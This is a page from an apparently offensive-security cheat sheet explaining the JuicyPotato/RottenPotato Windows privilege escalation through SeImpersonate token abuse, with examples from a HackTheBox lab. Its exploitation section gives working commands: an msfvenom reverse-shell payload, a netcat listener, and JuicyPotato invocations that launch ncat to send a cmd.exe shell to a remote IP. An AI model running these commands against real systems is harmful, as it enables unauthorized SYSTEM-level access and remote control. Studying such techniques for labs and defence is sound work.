Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Short Summary
  • Explanation
  • Requirements
  • Tokens
  • How It Works
  • Exploitation
  • External Links

Was this helpful?

  1. Post Exploitation
  2. Windows
  3. Windows Privilege Escalation

JuicyPotato/RottenPotato

PreviousEnumerationNextKernel Exploits

Last updated 2 years ago

Was this helpful?

Short Summary

If an user account you control has the SEImpersonate token (which most service accounts have), then you can get root.

Note: This exploit was effectively patched in Win10 1809 and Windows Server 2019. RoguePotato came out after that and I don't know if/when it was patched. aims to combine various *potato exploits into one script for easy exploitation.

Explanation

Requirements

If your user has SeImpersonate or SeAssignPrimaryToken privileges then you are effectively SYSTEM. Normal users don’t usually have these, but service-level users might. You can check this with whoami /all under "Privileges".

You also need to be able to call a DCOM service, which:

  1. implements the IMarshal interface

  2. runs as an elevated user (SYSTEM, Administrator, ...)

Normally this is port 6666, but there are other such services, in case that one is blocked.

Tokens

Every process has an access token, which specifies, what kinds of actions you can take. With the right privileges, Windows allows you to impersonate tokens for identification or for doing actions on another user’s behalf.

There are basically two kinds of impersonation tokens:

  • Delegate/impersonate - these allow you to perform actions

  • Identify/anonymous - for identification, don’t allow you to perform actions.

If you can get a delegate/impersonate impersonated access token with SYSTEM rights, then you can perform actions as SYSTEM.

How It Works

How RottenPotato works at a high level:

  1. Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.

  2. Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.

  3. Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.

Exploitation

You're going to need something for JuicyPotato to execute when it finishes successfully. For example, you could generate a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.14.20" LPORT=8002 -f exe > reverse.exe

Listen for the reverse shell on your machine:

nc -lnvp 8002

On the victim machine, execute juicypotato (in this case the x86 variant):

.\JuicyPotato.x86.exe -l 1337 -c "CLSID_HERE" -p C:\path\to\reverse.exe -t *

For example, in the hackthebox "devel" machine, this was the successful exploit (my reverse.exe was in the inetpub/wwwroot directory):

.\JuicyPotato.x86.exe -l 1337 -c "{4B635ECB-0887-4015-8CA6-D621362F98D1}" -p C:\inetpub\wwwroot\reverse.exe -t *

Alternatively, you can use it with a static ncat.exe file:

.\JuicyPotato.x86.exe -l 1337 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\Public\ncat.exe -e cmd.exe 10.10.14.17 8002" -t *

External Links

First of all, download the executable. If the official release isn't working, try an .

You're probably going to need to test multiple CLSIDs before you get a working one.

juicypotato
x86 version
Here is a list of CLSIDs to try.
SweetPotato
LogoGitHub - ohpe/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.GitHub
LogoRotten Potato – Privilege Escalation from Service Accounts to SYSTEMfoxglovesec
Technical explanation of RottenPotato, which JuicyPotato is based on
Blackhat technical talk about tokens